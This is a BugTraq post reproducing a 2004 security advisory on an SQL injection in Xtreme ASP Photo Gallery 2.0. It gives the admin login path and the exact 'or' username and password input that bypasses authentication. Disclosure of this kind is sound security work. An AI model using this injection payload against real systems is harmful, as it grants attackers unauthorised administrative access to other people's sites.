BugTraq
Xtreme ASP Photo Gallery Jan 15 2004 10:58PM
posidron tripbit org


Tripbit Security

Research

tripbit.org

Security Advisory

Advisory ID: TA-150104

Release Date: January

15th, 2004

Application: Xtreme ASP

Photo Gallery 2.0

Severity: Medium/High

Impact: Admin access

Class: Input

Validation Error

Vendor: http://

www.pensacolawebdesigns.com/

Overview

------------------------------------------------------------------------
--------------

XTREME ASP Photo Gallery is a photo gallery that

allows easy photo management and complete

administration via a web based interface. This

interface offers many more features than conventional

web based photo gallery's do. With XTREME ASP Photo

Gallery, you can configure everything including

colors, text styles, amount of imaged displayed per

page and much more.

Details

------------------------------------------------------------------------
--------------

Xtreme ASP Photo Gallery Version 2.0 is prone to a

common SQL injection vulnerability. The problem

occurs when handling user-supplied username and

password data supplied to authentication procedures.

http://[host]/photoalbum/admin/adminlogin.asp

If we type:

Username: 'or'

Password: 'or'

we gain admin access about the password protected

administrative pages.

Recommendation

------------------------------------------------------------------------
--------------

No solution for the moment.

Vendor Response

------------------------------------------------------------------------
--------------

The vendor has reportedly been notified to this

report.

Disclaimer

------------------------------------------------------------------------
--------------

The information within this paper may change without

notice. Use of this information

constitutes acceptance for use in an AS IS condition.

There are NO warranties with

regard to this information. In no event shall the

author be liable for any damages

whatsoever arising out of or in connection with the

use or spread of this information.

Any use of this information is at the user's own

risk.

Additional information

------------------------------------------------------------------------
--------------

These vulnerability have been found and researched

by:

posidron posidron (at) tripbit (dot) org [email concealed]

rushjo rushjo (at) tripbit (dot) org [email concealed]

You can find the last version of this warning in:

http://www.tripbit.org/advisories/TA-150104.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus